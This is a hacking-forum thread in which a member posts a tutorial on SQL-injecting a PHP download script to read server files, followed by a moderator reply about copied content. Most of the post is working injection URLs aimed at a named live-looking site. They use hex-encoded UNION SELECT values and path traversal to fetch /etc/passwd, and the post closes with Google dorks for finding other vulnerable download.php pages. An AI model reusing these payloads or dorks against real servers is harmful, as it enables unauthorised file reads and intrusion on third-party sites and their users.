Hello There, Guest! Login Register
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.

Sql Injection in a Download PHP Script leading to LFI

  • 0 Vote(s) - 0 Average

07-19-2017, 08:06 AM #1
MadSec Offline BlackHat **
Posts:7 Threads:5 Joined:Mar 2017 Reputation: 0
Mood: Mad
  • Clapping  Hello everyone,

  • The title says it, we’re going to sql inject a vulnerable Download PHP Script which will allow us later on to read files on the server.
  • This whole thing started with a Challenge posted on HF by SirRootALot and was only solved by 2 members including me which is kind of awkward and since a lot of people asked for an explanation I decided to make a tutorial.

  • What is this About:
  • Detailed Explanation about few MySql Functions/Operators/etc
  • Changing the Result of an Official Sql Statement using Sql Injection
  • A simple Example of a vulnerable Download PHP Script
  • Solving the Challenge

  • Detailed Explanation about few MySql Functions/Operators/etc + Changing the Result of a Sql Statement:

  • ORDER BY: The ORDER BY keyword is used to sort the data in a recordset.

  • Examples – Table's name=members Columns Count=5:
  • Code:
  • Select * from `members` ORDER BY 5
  • (This will work just fine)

  • Code:
  • Select `id`,`email` from `members` ORDER BY 5
  • (Won’t work obviously)

  • Code:
  • Select `id`, `email` from `members` ORDER BY 2
  • (Works great)

  • I had to make this clear for the sake of MySql and we’re also going to be in need of this later on.

  • UNION: UNION is used to combine the result from multiple SELECT statements into a single result set.

  • I also had to make this clear because what I’ve already mentioned is probably the only thing we’re going to use in this challenge… So as injectors, we need the UNION Syntax to inject our own Sql Statements, and the important thing here is that whenever we do that we are temporary adding an extra row to the table.

  • Pictures:

  • [Image: normal.png]

  • [Image: injected.png]

  • AND FALSE/null/etc…:

  • Pictures should be enough here:

  • [Image: normal2.png]

  • [Image: injected2.png]

  • See what was done there? We edited the Result, we do this the whole time and it’s exactly what we have to do this time as well, I just had to make this clear step by step for anyone in need.

  • A simple Example of a vulnerable Download PHP Script: 

  • Here’s something I wrote quickly: http://pastebin.com/dEvRnhc4

  • So there’s 2 primary things needed in every Download PHP Script and they are, 1, the name of the attachment which could be anything and , 2, the location of the file on the server itself.
  • Now in most cases, both of these values can be found in a database and a well secure Script would be perfect but unfortunately, in this case it’s not…

  • Solving the Challenge:

  • Vulnerable Link:
  • Code:
  • http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3
  • Getting Number of Columns:
  • Code:
  • http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3 ORDER BY 2
  • So, 2 columns are being used by the Select Sql Statement and these two columns are probably the ones holding the primary values needed for any Download PHP Script which means that the challenge is now solved…

  • Finalizing:
  • Code:
  • http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3 AND FALSE UNION SELECT nameoffilehere,locationhere
  • Or
  • Code:
  • http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3 AND FALSE UNION SELECT locationhere,nameoffilehere
  • Now we have to HEX everything because PHP Magic Quotes is ON which means that we can’t use ‘ or “
  • Code:
  • http://swse.doersgroup.gethompy.com/inc/down.php?fUID=3 AND FALSE UNION SELECT 0x6e616d656f6666696c6568657265,0x2f6574632f706173737764
  • Now this doesn’t download ‘/etc/passwd’ so before we move on lets try and move few directories backwards
  • Code:
  • http://swse.doersgroup.gethompy.com/inc/down.php?fUID=1000 and false union select 0x6e616d656f6666696c6568657265, 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
  • And we’re done here.

  • Solving this challenge needed basic knowledge of Mysql and PHP since you simply had to know what ‘Order By’, ‘Union Select’ and ‘And False’ actually means and how a Download PHP Script actually works etc…
  • Myself, I started using Erorr Based Sql Injection with the LOAD_FILE function which didn’t work out the way I wanted so I moved on to this solution which was neat and simple.

  • Now the good thing is that we can read any file on a server using any similar vulnerabilities instead of just reading what’s in the databases, and if you’re looking for more then go ahead and use Google with dorks, maybe:
  • inurl:down.php
  • inrul:download.php
  • inurl:down.php?id=
  • etc..

[Image: qXShBci.png]

07-19-2017, 06:38 PM #2
H4x0rl1f3 Offline Commander In Cheif *******
Posts:1,129 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
Stop posting tutorial copy paste form other boards, i will review and remove it.
Only share your genuine content.

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!

Forum Jump:

Users browsing this thread:1 Guest(s)